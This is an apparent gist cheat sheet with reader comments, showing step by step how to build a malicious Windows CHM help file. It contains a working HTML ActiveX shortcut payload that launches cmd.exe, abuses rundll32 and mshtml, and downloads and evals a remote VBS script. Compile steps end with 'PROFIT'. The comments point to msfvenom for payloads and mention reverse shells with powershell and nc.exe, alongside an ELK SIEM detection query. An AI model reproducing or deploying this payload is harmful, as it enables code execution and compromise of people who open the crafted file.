CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Malicious-CHM-Guide.md

Procedure for generating Malicious CHM file

• Step 0: Download and install Microsoft HTML Help Workshop and Documentation
• Step 1: Obtain a valid CHM file and unpack it using 7-zip
• Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>

• Step 3: Prepare Project.hpp file with contents like the below ones:

[OPTIONS]
Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc
[FILES]
<PATH-TO-UNPACKED-CHM-DIRECTORY>\docs\Malicious-File.htm

Add every file needed by that CHM to the FILES section. Remember to include also previously modified malicious HTM file.

• Step 4: Compile the project within CHM directory using hpp.exe compiler:

<PATH-TO-UNPACKED-CHM-DIRECTORY> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp
Microsoft HTML Help Compiler 4.74.8702

Compiling <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm


Compile time: 0 minutes, 1 second
353     Topics
7,208   Local links
187     Internet links
2       Graphics


Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes
Compression decreased file by 2,091,702 bytes.

• Step 5: PROFIT.

Sorry, which parrt is the bit to be edited to control what's executed? I assume most of the commands are setting it up.

where is test.vbs file ?? . Can you also post that content?. I assume this is incomplete without it ..

This was only a demonstration of where to put your command to. You can have any sort of VBS, ps1, js script there really. For a simplest example - generate yourself a one using publicly available toolkits such as msfvenom.

Someone please suggest .chm payload where hh.exe will make network connection (this is SIEM rule test requirement) I tried this and Out-CHM.ps1 to create reverse shell payload with powershell/nc.exe but that doesn't meet the requirement of network connection by hh.exe.

This is to meet ELK SIEM rule query-

sequence by process.entity_id [process where process.name : "hh.exe" and event.type == "start"] [network where process.name : "hh.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

Someone please suggest .chm payload where hh.exe will make network connection (this is SIEM rule test requirement) I tried this and Out-CHM.ps1 to create reverse shell payload with powershell/nc.exe but that doesn't meet the requirement of network connection by hh.exe.

This is to meet ELK SIEM rule query-
sequence by process.entity_id [process where process.name : "hh.exe" and event.type == "start"] [network where process.name : "hh.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

A malicious CHM file is not required for your use case. hh.exe supports a URL as a command line argument.

hh.exe http://example.com